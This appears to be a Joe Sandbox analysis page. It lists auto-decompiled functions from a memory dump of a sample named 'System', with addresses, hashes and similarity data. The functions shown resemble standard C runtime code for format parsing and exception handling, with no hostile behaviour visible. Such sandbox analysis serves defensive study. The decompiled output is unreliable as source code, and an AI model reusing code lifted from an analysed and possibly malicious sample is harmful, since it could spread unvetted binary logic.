				_t71 = E00007FF67FF6E4C6A5D8();
				goto 0xe4c6afc3;
				 *((long long*)(__rcx + 0x470)) =  *((long long*)(__rcx + 0x470)) + 1;
				if ( *((long long*)(__rcx + 0x470)) == 2) goto 0xe4c6afc0;
				 *((long long*)(__rcx + 0x50)) = 0;
				 *(__rcx + 0x2c) = 0;
				goto 0xe4c6af8d;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x28)) < 0) goto 0xe4c6afa2;
				if (_t71 - 0x5a > 0) goto 0xe4c6ae6a;
				asm("lfence");
				goto 0xe4c6ae6c;
				_t120 = 0 +  *(__rcx + 0x2c);
				_t122 = ( *(0 +  *(__rcx + 0x2c) + 0xe4c93c30) & 0x000000ff) >> 4;
				 *(__rcx + 0x2c) = _t122;
				if (_t122 == 8) goto 0xe4c6afd8;
				_t87 = _t122;
				if (_t87 == 0) goto 0xe4c6af81;
				if (_t87 == 0) goto 0xe4c6af6d;
				if (_t87 == 0) goto 0xe4c6af38;
				if (_t87 == 0) goto 0xe4c6af0c;
				if (_t87 == 0) goto 0xe4c6af04;
				if (_t87 == 0) goto 0xe4c6aed7;
				if (_t87 == 0) goto 0xe4c6aeca;
				if (_t122 - 0xfffffffffffffffc != 1) goto 0xe4c6afe8;
				E00007FF67FF6E4C6B488(__rcx, __rcx, 0, 0xe4c93c30);
				goto 0xe4c6af89;
				E00007FF67FF6E4C6B314(_t120, _t114);
				goto 0xe4c6af89;
				if ( *((char*)(_t114 + 0x41)) == 0x2a) goto 0xe4c6aeee;
				E00007FF67FF6E4C6AD30(_t120, _t114, _t114, _t114 + 0x38, 0xe4c93c30);
				goto 0xe4c6af89;
				 *((long long*)(_t114 + 0x20)) =  *((long long*)(_t114 + 0x20)) + 8;
				_t132 =  *((intOrPtr*)( *((intOrPtr*)(_t114 + 0x20)) - 8));
				_t133 =  <  ? _t142 : _t132;
				 *(_t114 + 0x38) =  <  ? _t142 : _t132;
				goto 0xe4c6af34;
				 *(_t114 + 0x38) = 0;
				goto 0xe4c6af8d;
				if ( *((char*)(_t114 + 0x41)) == 0x2a) goto 0xe4c6af18;
				goto 0xe4c6aee1;
				 *((long long*)(_t114 + 0x20)) =  *((long long*)(_t114 + 0x20)) + 8;
				_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t114 + 0x20)) - 8));
				 *(_t114 + 0x34) = _t134;
				if (_t134 >= 0) goto 0xe4c6af34;
				 *(_t114 + 0x30) =  *(_t114 + 0x30) | 0x00000004;
				 *(_t114 + 0x34) =  ~_t134;
				goto 0xe4c6af89;
				_t76 =  *((intOrPtr*)(_t114 + 0x41));
				if (_t76 == 0x20) goto 0xe4c6af67;
				if (_t76 == 0x23) goto 0xe4c6af61;
				if (_t76 == 0x2b) goto 0xe4c6af5b;
				if (_t76 == 0x2d) goto 0xe4c6af55;
				if (_t76 != 0x30) goto 0xe4c6af8d;
				 *(_t114 + 0x30) =  *(_t114 + 0x30) | 0x00000008;
				goto 0xe4c6af8d;
				 *(_t114 + 0x30) =  *(_t114 + 0x30) | 0x00000004;
				goto 0xe4c6af8d;
				 *(_t114 + 0x30) =  *(_t114 + 0x30) | 0x00000001;
				goto 0xe4c6af8d;
				 *(_t114 + 0x30) =  *(_t114 + 0x30) | 0x00000020;
				goto 0xe4c6af8d;
				 *(_t114 + 0x30) =  *(_t114 + 0x30) | 0x00000002;
				goto 0xe4c6af8d;
				 *(_t114 + 0x30) = 0;
				 *((intOrPtr*)(_t114 + 0x40)) = sil;
				 *(_t114 + 0x38) = _t142;
				 *((long long*)(_t114 + 0x3c)) = 0;
				 *((intOrPtr*)(_t114 + 0x54)) = sil;
				goto 0xe4c6af8d;
				_t77 = E00007FF67FF6E4C6B1F8(_t114);
				if (_t77 == 0) goto 0xe4c6afe8;
				_t79 =  *((intOrPtr*)( *((intOrPtr*)(_t114 + 0x18))));
				 *((char*)(_t114 + 0x41)) = _t79;
				if (_t79 != 0) goto 0xe4c6ae3f;
				 *((long long*)(_t114 + 0x18)) =  *((long long*)(_t114 + 0x18)) + 1;
				if ( *((intOrPtr*)(_t114 + 0x2c)) == 0) goto 0xe4c6afad;
				if ( *((long long*)(_t114 + 0x2c)) != 7) goto 0xe4c6afd8;
				 *((long long*)(_t114 + 0x470)) =  *((long long*)(_t114 + 0x470)) + 1;
				if ( *((long long*)(_t114 + 0x470)) != 2) goto 0xe4c6ae34;
				return _t77;
			}














                                                                                                                                                              0x7ff6e4c6add4
                                                                                                                                                              0x7ff6e4c6add9
                                                                                                                                                              0x7ff6e4c6adde
                                                                                                                                                              0x7ff6e4c6ade8
                                                                                                                                                              0x7ff6e4c6aded
                                                                                                                                                              0x7ff6e4c6adf7
                                                                                                                                                              0x7ff6e4c6ae01
                                                                                                                                                              0x7ff6e4c6ae03
                                                                                                                                                              0x7ff6e4c6ae08
                                                                                                                                                              0x7ff6e4c6ae0e
                                                                                                                                                              0x7ff6e4c6ae15
                                                                                                                                                              0x7ff6e4c6ae1a
                                                                                                                                                              0x7ff6e4c6ae27
                                                                                                                                                              0x7ff6e4c6ae34
                                                                                                                                                              0x7ff6e4c6ae37
                                                                                                                                                              0x7ff6e4c6ae3a
                                                                                                                                                              0x7ff6e4c6ae3f
                                                                                                                                                              0x7ff6e4c6ae46
                                                                                                                                                              0x7ff6e4c6ae57
                                                                                                                                                              0x7ff6e4c6ae59
                                                                                                                                                              0x7ff6e4c6ae68
                                                                                                                                                              0x7ff6e4c6ae6f
                                                                                                                                                              0x7ff6e4c6ae77
                                                                                                                                                              0x7ff6e4c6ae7a
                                                                                                                                                              0x7ff6e4c6ae80
                                                                                                                                                              0x7ff6e4c6ae86
                                                                                                                                                              0x7ff6e4c6ae88
                                                                                                                                                              0x7ff6e4c6ae91
                                                                                                                                                              0x7ff6e4c6ae9a
                                                                                                                                                              0x7ff6e4c6aea3
                                                                                                                                                              0x7ff6e4c6aea8
                                                                                                                                                              0x7ff6e4c6aead
                                                                                                                                                              0x7ff6e4c6aeb2
                                                                                                                                                              0x7ff6e4c6aeb7
                                                                                                                                                              0x7ff6e4c6aec0
                                                                                                                                                              0x7ff6e4c6aec5
                                                                                                                                                              0x7ff6e4c6aecd
                                                                                                                                                              0x7ff6e4c6aed2
                                                                                                                                                              0x7ff6e4c6aedb
                                                                                                                                                              0x7ff6e4c6aee4
                                                                                                                                                              0x7ff6e4c6aee9
                                                                                                                                                              0x7ff6e4c6aeee
                                                                                                                                                              0x7ff6e4c6aef7
                                                                                                                                                              0x7ff6e4c6aefc
                                                                                                                                                              0x7ff6e4c6aeff
                                                                                                                                                              0x7ff6e4c6af02
                                                                                                                                                              0x7ff6e4c6af04
                                                                                                                                                              0x7ff6e4c6af07
                                                                                                                                                              0x7ff6e4c6af10
                                                                                                                                                              0x7ff6e4c6af16
                                                                                                                                                              0x7ff6e4c6af18
                                                                                                                                                              0x7ff6e4c6af21
                                                                                                                                                              0x7ff6e4c6af24
                                                                                                                                                              0x7ff6e4c6af29
                                                                                                                                                              0x7ff6e4c6af2b
                                                                                                                                                              0x7ff6e4c6af31
                                                                                                                                                              0x7ff6e4c6af36
                                                                                                                                                              0x7ff6e4c6af38
                                                                                                                                                              0x7ff6e4c6af3d
                                                                                                                                                              0x7ff6e4c6af41
                                                                                                                                                              0x7ff6e4c6af45
                                                                                                                                                              0x7ff6e4c6af49
                                                                                                                                                              0x7ff6e4c6af4d
                                                                                                                                                              0x7ff6e4c6af4f
                                                                                                                                                              0x7ff6e4c6af53
                                                                                                                                                              0x7ff6e4c6af55
                                                                                                                                                              0x7ff6e4c6af59
                                                                                                                                                              0x7ff6e4c6af5b
                                                                                                                                                              0x7ff6e4c6af5f
                                                                                                                                                              0x7ff6e4c6af61
                                                                                                                                                              0x7ff6e4c6af65
                                                                                                                                                              0x7ff6e4c6af67
                                                                                                                                                              0x7ff6e4c6af6b
                                                                                                                                                              0x7ff6e4c6af6d
                                                                                                                                                              0x7ff6e4c6af71
                                                                                                                                                              0x7ff6e4c6af75
                                                                                                                                                              0x7ff6e4c6af78
                                                                                                                                                              0x7ff6e4c6af7b
                                                                                                                                                              0x7ff6e4c6af7f
                                                                                                                                                              0x7ff6e4c6af84
                                                                                                                                                              0x7ff6e4c6af8b
                                                                                                                                                              0x7ff6e4c6af91
                                                                                                                                                              0x7ff6e4c6af93
                                                                                                                                                              0x7ff6e4c6af98
                                                                                                                                                              0x7ff6e4c6af9e
                                                                                                                                                              0x7ff6e4c6afa5
                                                                                                                                                              0x7ff6e4c6afab
                                                                                                                                                              0x7ff6e4c6afad
                                                                                                                                                              0x7ff6e4c6afba
                                                                                                                                                              0x7ff6e4c6afd7

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID: $*
                                                                                                                                                              • API String ID: 3215553584-3982473090
                                                                                                                                                              • Opcode ID: 389e6599efa46bdfa1d36c5140e56b4e0358bdf375aa5de0434f5ce8ff31651c
                                                                                                                                                              • Instruction ID: 0fc22dddeb1c35a7b2a9a898547439c71d51073355569caf333a755027da7a6f
                                                                                                                                                              • Opcode Fuzzy Hash: 389e6599efa46bdfa1d36c5140e56b4e0358bdf375aa5de0434f5ce8ff31651c
                                                                                                                                                              • Instruction Fuzzy Hash: A56156B79A825386E7688E3480D527C37B0EB06F44F14617BD64A83694CF2BD441D74B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C6AFEC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                              			E00007FF67FF6E4C6AFEC(void* __edi, void* __esi, long long* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rbp, long long _a16, long long _a24) {
				void* _t74;
				intOrPtr _t79;
				void* _t80;
				char _t82;
				unsigned long long _t91;
				unsigned long long _t111;
				void* _t123;
				intOrPtr _t133;
				signed long long _t135;
				signed long long _t142;
				signed long long _t143;
				void* _t144;

				_a16 = __rbx;
				_a24 = __rbp;
				_t143 = _t142 | 0xffffffff;
				_t123 = __rcx;
				if ( *((long long*)(__rcx + 0x468)) == 0) goto 0xe4c6b1e2;
				if ( *((long long*)(__rcx + 0x18)) != 0) goto 0xe4c6b02d;
				E00007FF67FF6E4C6C854(__rax);
				 *__rax = 0x16;
				_t74 = E00007FF67FF6E4C6A5D8();
				goto 0xe4c6b1d2;
				 *((long long*)(__rcx + 0x470)) =  *((long long*)(__rcx + 0x470)) + 1;
				if ( *((long long*)(__rcx + 0x470)) == 2) goto 0xe4c6b1cf;
				 *(__rcx + 0x50) =  *(__rcx + 0x50) & 0x00000000;
				 *(__rcx + 0x2c) =  *(__rcx + 0x2c) & 0x00000000;
				goto 0xe4c6b1a7;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 1;
				if ( *((long long*)(__rcx + 0x28)) < 0) goto 0xe4c6b1bc;
				if (_t74 - 0x5a > 0) goto 0xe4c6b080;
				asm("lfence");
				goto 0xe4c6b082;
				_t111 = ( *( *(__rcx + 0x2c) + 0x7ff6e4c93bd0) & 0x000000ff) >> 4;
				 *(__rcx + 0x2c) = _t111;
				if (_t111 == 8) goto 0xe4c6b1e2;
				_t91 = _t111;
				if (_t91 == 0) goto 0xe4c6b19b;
				if (_t91 == 0) goto 0xe4c6b182;
				if (_t91 == 0) goto 0xe4c6b14d;
				if (_t91 == 0) goto 0xe4c6b121;
				if (_t91 == 0) goto 0xe4c6b118;
				if (_t91 == 0) goto 0xe4c6b0eb;
				if (_t91 == 0) goto 0xe4c6b0de;
				if (_t111 - 0xfffffffffffffffc != 1) goto 0xe4c6b1f2;
				E00007FF67FF6E4C6B488(__rcx, __rcx, _t144, 0xe4c93bd0);
				goto 0xe4c6b1a3;
				E00007FF67FF6E4C6B314(_t111 - 0xfffffffffffffffc, _t123);
				goto 0xe4c6b1a3;
				if ( *((char*)(_t123 + 0x41)) == 0x2a) goto 0xe4c6b102;
				E00007FF67FF6E4C6AD30(_t111 - 0xfffffffffffffffc, _t123, _t123, _t123 + 0x38, 0xe4c93bd0);
				goto 0xe4c6b1a3;
				 *((long long*)(_t123 + 0x20)) =  *((long long*)(_t123 + 0x20)) + 8;
				_t133 =  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x20)) - 8));
				_t134 =  <  ? _t143 : _t133;
				 *(_t123 + 0x38) =  <  ? _t143 : _t133;
				goto 0xe4c6b149;
				 *(_t123 + 0x38) =  *(_t123 + 0x38) & 0x00000000;
				goto 0xe4c6b1a7;
				if ( *((char*)(_t123 + 0x41)) == 0x2a) goto 0xe4c6b12d;
				goto 0xe4c6b0f5;
				 *((long long*)(_t123 + 0x20)) =  *((long long*)(_t123 + 0x20)) + 8;
				_t135 =  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x20)) - 8));
				 *(_t123 + 0x34) = _t135;
				if (_t135 >= 0) goto 0xe4c6b149;
				 *(_t123 + 0x30) =  *(_t123 + 0x30) | 0x00000004;
				 *(_t123 + 0x34) =  ~_t135;
				goto 0xe4c6b1a3;
				_t79 =  *((intOrPtr*)(_t123 + 0x41));
				if (_t79 == 0x20) goto 0xe4c6b17c;
				if (_t79 == 0x23) goto 0xe4c6b176;
				if (_t79 == 0x2b) goto 0xe4c6b170;
				if (_t79 == 0x2d) goto 0xe4c6b16a;
				if (_t79 != 0x30) goto 0xe4c6b1a7;
				 *(_t123 + 0x30) =  *(_t123 + 0x30) | 0x00000008;
				goto 0xe4c6b1a7;
				 *(_t123 + 0x30) =  *(_t123 + 0x30) | 0x00000004;
				goto 0xe4c6b1a7;
				 *(_t123 + 0x30) =  *(_t123 + 0x30) | 0x00000001;
				goto 0xe4c6b1a7;
				 *(_t123 + 0x30) =  *(_t123 + 0x30) | 0x00000020;
				goto 0xe4c6b1a7;
				 *(_t123 + 0x30) =  *(_t123 + 0x30) | 0x00000002;
				goto 0xe4c6b1a7;
				 *(_t123 + 0x34) =  *(_t123 + 0x34) & 0x00000000;
				 *(_t123 + 0x30) =  *(_t123 + 0x30) & 0x00000000;
				 *(_t123 + 0x3c) =  *(_t123 + 0x3c) & 0x00000000;
				 *((char*)(_t123 + 0x40)) = 0;
				 *(_t123 + 0x38) = _t143;
				 *((char*)(_t123 + 0x54)) = 0;
				goto 0xe4c6b1a7;
				_t80 = E00007FF67FF6E4C6B1F8(_t123);
				if (_t80 == 0) goto 0xe4c6b1f2;
				_t82 =  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x18))));
				 *((char*)(_t123 + 0x41)) = _t82;
				if (_t82 != 0) goto 0xe4c6b054;
				 *((long long*)(_t123 + 0x18)) =  *((long long*)(_t123 + 0x18)) + 1;
				 *((long long*)(_t123 + 0x470)) =  *((long long*)(_t123 + 0x470)) + 1;
				if ( *((long long*)(_t123 + 0x470)) != 2) goto 0xe4c6b047;
				return _t80;
			}















                                                                                                                                                              0x7ff6e4c6afec
                                                                                                                                                              0x7ff6e4c6aff1
                                                                                                                                                              0x7ff6e4c6affb
                                                                                                                                                              0x7ff6e4c6affe
                                                                                                                                                              0x7ff6e4c6b009
                                                                                                                                                              0x7ff6e4c6b014
                                                                                                                                                              0x7ff6e4c6b016
                                                                                                                                                              0x7ff6e4c6b01b
                                                                                                                                                              0x7ff6e4c6b021
                                                                                                                                                              0x7ff6e4c6b028
                                                                                                                                                              0x7ff6e4c6b02d
                                                                                                                                                              0x7ff6e4c6b03a
                                                                                                                                                              0x7ff6e4c6b047
                                                                                                                                                              0x7ff6e4c6b04b
                                                                                                                                                              0x7ff6e4c6b04f
                                                                                                                                                              0x7ff6e4c6b054
                                                                                                                                                              0x7ff6e4c6b05c
                                                                                                                                                              0x7ff6e4c6b06d
                                                                                                                                                              0x7ff6e4c6b06f
                                                                                                                                                              0x7ff6e4c6b07e
                                                                                                                                                              0x7ff6e4c6b08b
                                                                                                                                                              0x7ff6e4c6b08e
                                                                                                                                                              0x7ff6e4c6b094
                                                                                                                                                              0x7ff6e4c6b09a
                                                                                                                                                              0x7ff6e4c6b09c
                                                                                                                                                              0x7ff6e4c6b0a5
                                                                                                                                                              0x7ff6e4c6b0ae
                                                                                                                                                              0x7ff6e4c6b0b7
                                                                                                                                                              0x7ff6e4c6b0bc
                                                                                                                                                              0x7ff6e4c6b0c1
                                                                                                                                                              0x7ff6e4c6b0c6
                                                                                                                                                              0x7ff6e4c6b0cb
                                                                                                                                                              0x7ff6e4c6b0d4
                                                                                                                                                              0x7ff6e4c6b0d9
                                                                                                                                                              0x7ff6e4c6b0e1
                                                                                                                                                              0x7ff6e4c6b0e6
                                                                                                                                                              0x7ff6e4c6b0ef
                                                                                                                                                              0x7ff6e4c6b0f8
                                                                                                                                                              0x7ff6e4c6b0fd
                                                                                                                                                              0x7ff6e4c6b102
                                                                                                                                                              0x7ff6e4c6b10b
                                                                                                                                                              0x7ff6e4c6b110
                                                                                                                                                              0x7ff6e4c6b113
                                                                                                                                                              0x7ff6e4c6b116
                                                                                                                                                              0x7ff6e4c6b118
                                                                                                                                                              0x7ff6e4c6b11c
                                                                                                                                                              0x7ff6e4c6b125
                                                                                                                                                              0x7ff6e4c6b12b
                                                                                                                                                              0x7ff6e4c6b12d
                                                                                                                                                              0x7ff6e4c6b136
                                                                                                                                                              0x7ff6e4c6b139
                                                                                                                                                              0x7ff6e4c6b13e
                                                                                                                                                              0x7ff6e4c6b140
                                                                                                                                                              0x7ff6e4c6b146
                                                                                                                                                              0x7ff6e4c6b14b
                                                                                                                                                              0x7ff6e4c6b14d
                                                                                                                                                              0x7ff6e4c6b152
                                                                                                                                                              0x7ff6e4c6b156
                                                                                                                                                              0x7ff6e4c6b15a
                                                                                                                                                              0x7ff6e4c6b15e
                                                                                                                                                              0x7ff6e4c6b162
                                                                                                                                                              0x7ff6e4c6b164
                                                                                                                                                              0x7ff6e4c6b168
                                                                                                                                                              0x7ff6e4c6b16a
                                                                                                                                                              0x7ff6e4c6b16e
                                                                                                                                                              0x7ff6e4c6b170
                                                                                                                                                              0x7ff6e4c6b174
                                                                                                                                                              0x7ff6e4c6b176
                                                                                                                                                              0x7ff6e4c6b17a
                                                                                                                                                              0x7ff6e4c6b17c
                                                                                                                                                              0x7ff6e4c6b180
                                                                                                                                                              0x7ff6e4c6b182
                                                                                                                                                              0x7ff6e4c6b186
                                                                                                                                                              0x7ff6e4c6b18a
                                                                                                                                                              0x7ff6e4c6b18e
                                                                                                                                                              0x7ff6e4c6b192
                                                                                                                                                              0x7ff6e4c6b195
                                                                                                                                                              0x7ff6e4c6b199
                                                                                                                                                              0x7ff6e4c6b19e
                                                                                                                                                              0x7ff6e4c6b1a5
                                                                                                                                                              0x7ff6e4c6b1ab
                                                                                                                                                              0x7ff6e4c6b1ad
                                                                                                                                                              0x7ff6e4c6b1b2
                                                                                                                                                              0x7ff6e4c6b1b8
                                                                                                                                                              0x7ff6e4c6b1bc
                                                                                                                                                              0x7ff6e4c6b1c9
                                                                                                                                                              0x7ff6e4c6b1e1

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID: $*
                                                                                                                                                              • API String ID: 3215553584-3982473090
                                                                                                                                                              • Opcode ID: 0e15af01a23a2ca4d13a88c4a0f2e907c061259ee2eea85d0c19f9db09e0734c
                                                                                                                                                              • Instruction ID: 7e6f842fe09625bd7dcfa82f6856d25a3d843f9ac7f64a644216d09a9b955e26
                                                                                                                                                              • Opcode Fuzzy Hash: 0e15af01a23a2ca4d13a88c4a0f2e907c061259ee2eea85d0c19f9db09e0734c
                                                                                                                                                              • Instruction Fuzzy Hash: C161547F9AC26396E7648E3880D437837B1EB05F08F149177C7498319DEF2AE581CA4A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C66380 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                              			E00007FF67FF6E4C66380(long long __rbx, intOrPtr* __rcx, long long __rdx, long long __r8, void* __r9) {
				void* _t19;
				void* _t26;
				long long _t27;
				void* _t36;
				void* _t39;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t46;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;

				_t26 = _t45;
				 *((long long*)(_t26 + 0x20)) = __rbx;
				 *((long long*)(_t26 + 0x18)) = __r8;
				 *((long long*)(_t26 + 0x10)) = __rdx;
				_t43 = _t26 - 0x3f;
				_t46 = _t45 - 0xc0;
				if ( *((long long*)(__rcx)) == 0x80000003) goto 0xe4c66424;
				E00007FF67FF6E4C64EF8(_t26);
				r12d =  *((intOrPtr*)(_t43 + 0x6f));
				if ( *((long long*)(_t26 + 0x10)) == 0) goto 0xe4c6643f;
				__imp__EncodePointer(_t59, _t56, _t54, _t52, _t36, _t39, _t42);
				E00007FF67FF6E4C64EF8(_t26);
				if ( *((intOrPtr*)(_t26 + 0x10)) == _t26) goto 0xe4c6643f;
				if ( *__rcx == 0xe0434f4d) goto 0xe4c6643f;
				r13d =  *((intOrPtr*)(_t43 + 0x77));
				if ( *__rcx == 0xe0434352) goto 0xe4c66443;
				_t27 =  *((intOrPtr*)(_t43 + 0x7f));
				 *((intOrPtr*)(_t46 + 0x38)) = r12d;
				 *((long long*)(_t46 + 0x30)) = _t27;
				 *((intOrPtr*)(_t46 + 0x28)) = r13d;
				 *((long long*)(_t46 + 0x20)) =  *((intOrPtr*)(_t43 + 0x67));
				_t19 = E00007FF67FF6E4C632F0(__rcx,  *((intOrPtr*)(_t43 + 0x4f)), __r8, __r9);
				if (_t27 == 0) goto 0xe4c66443;
				return _t19;
			}
















                                                                                                                                                              0x7ff6e4c66380
                                                                                                                                                              0x7ff6e4c66383
                                                                                                                                                              0x7ff6e4c66387
                                                                                                                                                              0x7ff6e4c6638b
                                                                                                                                                              0x7ff6e4c6639a
                                                                                                                                                              0x7ff6e4c6639e
                                                                                                                                                              0x7ff6e4c663b4
                                                                                                                                                              0x7ff6e4c663b6
                                                                                                                                                              0x7ff6e4c663bb
                                                                                                                                                              0x7ff6e4c663c8
                                                                                                                                                              0x7ff6e4c663cc
                                                                                                                                                              0x7ff6e4c663d5
                                                                                                                                                              0x7ff6e4c663de
                                                                                                                                                              0x7ff6e4c663e7
                                                                                                                                                              0x7ff6e4c663f0
                                                                                                                                                              0x7ff6e4c663f4
                                                                                                                                                              0x7ff6e4c663f6
                                                                                                                                                              0x7ff6e4c66404
                                                                                                                                                              0x7ff6e4c6640c
                                                                                                                                                              0x7ff6e4c66411
                                                                                                                                                              0x7ff6e4c66416
                                                                                                                                                              0x7ff6e4c6641b
                                                                                                                                                              0x7ff6e4c66422
                                                                                                                                                              0x7ff6e4c6643e

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CallEncodePointerTranslator
                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                              • API String ID: 3544855599-2084237596
                                                                                                                                                              • Opcode ID: d5ba12a3f3656f9147ec52c5cf84c1fff3ce0e69a550e04dd3e60d0cd19f7683
                                                                                                                                                              • Instruction ID: 6fb363fa8cc326304f8bf81dd7c8923d2ab089dbbb9765b980e4251f6af3dc64
                                                                                                                                                              • Opcode Fuzzy Hash: d5ba12a3f3656f9147ec52c5cf84c1fff3ce0e69a550e04dd3e60d0cd19f7683
                                                                                                                                                              • Instruction Fuzzy Hash: 5B51377BA18A868AE720CF65D0813BD7BB0FB84F88F148166EE4957B59CF39E045C705
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C66B0C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 60%
                                                                                                                                                              			E00007FF67FF6E4C66B0C(long long __rbx, long long* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32, signed int* _a40, void* _a48, signed long long _a56, signed int _a64) {
				signed long long _v32;
				long long _v40;
				char _v48;
				signed int* _v56;
				void* _t55;
				intOrPtr _t58;
				signed char _t61;
				void* _t65;
				void* _t66;
				void* _t67;
				signed int _t87;
				void* _t95;
				signed long long _t97;
				intOrPtr _t105;
				signed int* _t112;
				void* _t117;
				void* _t127;
				long long* _t134;
				void* _t137;
				void* _t140;
				void* _t142;
				void* _t156;
				void* _t157;

				_t127 = __rdx;
				_t95 = _t142;
				 *((long long*)(_t95 + 8)) = __rbx;
				 *((long long*)(_t95 + 0x10)) = __rbp;
				 *((long long*)(_t95 + 0x18)) = __rsi;
				 *((long long*)(_t95 + 0x20)) = __rdi;
				_t134 = __rcx;
				_t137 = __r9;
				_t157 = __r8;
				_t140 = __rdx;
				E00007FF67FF6E4C68194(_t55, __r8);
				E00007FF67FF6E4C64EF8(_t95);
				_t112 = _a40;
				_t112[0x1d40101e] = _t112[0x1d40101e] + 0x38;
				if ( *__rcx == 0xe06d7363) goto 0xe4c66b8e;
				if ( *((intOrPtr*)(__rcx)) != 0x80000029) goto 0xe4c66b72;
				if ( *((long long*)(__rcx + 0x18)) != 0xf) goto 0xe4c66b76;
				goto 0xe4c66b74;
				if ( *((intOrPtr*)(__rcx)) == _t127) goto 0xe4c66b8e;
				_t97 =  *_t112 & 0x1fffffff;
				if (_t97 - 0x19930522 < 0) goto 0xe4c66b8e;
				if ((_t112[9] & 0x00000001) != 0) goto 0xe4c66d1d;
				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0xe4c66c26;
				if (_t112[1] == 0) goto 0xe4c66d1d;
				if (_a48 != 0) goto 0xe4c66d1d;
				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0xe4c66c13;
				if ( *((intOrPtr*)(__rcx)) != _t127) goto 0xe4c66bf1;
				_t58 = E00007FF67FF6E4C6513C(_t112, __r9,  *((intOrPtr*)(__r9 + 0x20)), __r9);
				if (_t97 - 0xffffffff < 0) goto 0xe4c66d3d;
				if (_t97 - _t112[1] >= 0) goto 0xe4c66d3d;
				r9d = _t58;
				_t117 = _t140;
				E00007FF67FF6E4C67804(_t97, _t117, __r9, _t112);
				goto 0xe4c66d1d;
				if ( *_t134 != _t117) goto 0xe4c66c13;
				r9d =  *((intOrPtr*)(_t134 + 0x38));
				if (r9d - 0xffffffff < 0) goto 0xe4c66d3d;
				if (r9d - _t112[1] >= 0) goto 0xe4c66d3d;
				goto 0xe4c66be1;
				E00007FF67FF6E4C63544(r9d - _t112[1], _t97, _t112, __r9, __r9, _t112);
				goto 0xe4c66d1d;
				if (_t112[3] != 0) goto 0xe4c66c6e;
